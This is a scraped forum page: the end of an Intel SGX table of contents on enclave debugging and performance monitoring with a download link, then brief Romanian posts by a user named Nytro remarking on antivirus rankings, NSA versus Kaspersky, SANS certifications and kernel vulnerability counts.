. . . . . . . . 7-4 7.3.1 Breakpoint Suppression . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.3.2 Breakpoint Match Reporting during Enclave Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.3.3 Reporting of Code Breakpoint on Next Instruction on a Debug Trap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.3.4 RFLAGS.RF Treatment on AEX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.3.5 Breakpoint Matching in SGX Instruction Flows. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.4 INT3 Consideration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.4.1 Behavior of INT3 inside an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.4.2 Debugger Considerations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.4.3 VMM Considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.5 Branch Tracing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.5.1 BTF Treatment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.5.2 LBR Treatment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.5.2.1 LBR Stack on Opt-in Entry. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.5.2.2 LBR Stack on Opt-out Entry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-6 7.5.2.3 Mispredict Bit, Record Type, and Filtering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-7 7.6 Interaction with Performance Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-7 7.6.1 IA32_PERF_GLOBAL_STATUS Enhancement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-7 7.6.2 Performance Monitoring with Opt-in Entry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-7 7.6.3 Performance Monitoring with Opt-out Entry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-8 7.6.4 Enclave Exit and Performance Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-8 7.6.5 PEBS Record Generation on SGX Instructions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-8 7.6.6 Exception-Handling on PEBS/BTS Loads/Stores after AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-9 7.6.6.1 Other Interactions with Performance Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-9 Download: https://software.intel.com/sites/default/files/329298-001.pdf
  21. Nytro
    E posibil sa fie asa: virusul nu trebuie sa fie neaparat extrem de sofisticat dar: 1. Bitdefender o sa il detecteze 2. Ceilalti nu o sa il detecteze Rezultat: Primul loc in AV-Test. Cat despre "Hotul striga uite hotul" e ceva mai gros la mijloc: NSA aka SUA vs Kaspersky aka Rusia.
  22. Nytro
    Nu e Marketing, e un "atac" la adresa SUA.
  23. Nytro
    Vai, dragutii de la SANS... Si certificarile lor de 5000 de $
  24. Nytro
    Uau. Ca sa vezi: Linux kernel are mai multe probleme ca Windows kernel. (Problemele sunt majoritatea comune intre diverse versiuni: 7, 8, 8.1...) Ce sa insemne asta? Oare va da peste cap ideea cu "Dar vai, Linux e mai secure decat Windows" ?
  25. Nytro
    Da, se pare ca vBulletin nu e singurul script cu astfel de probleme. L-a testat cineva?
×
×
  • Create New...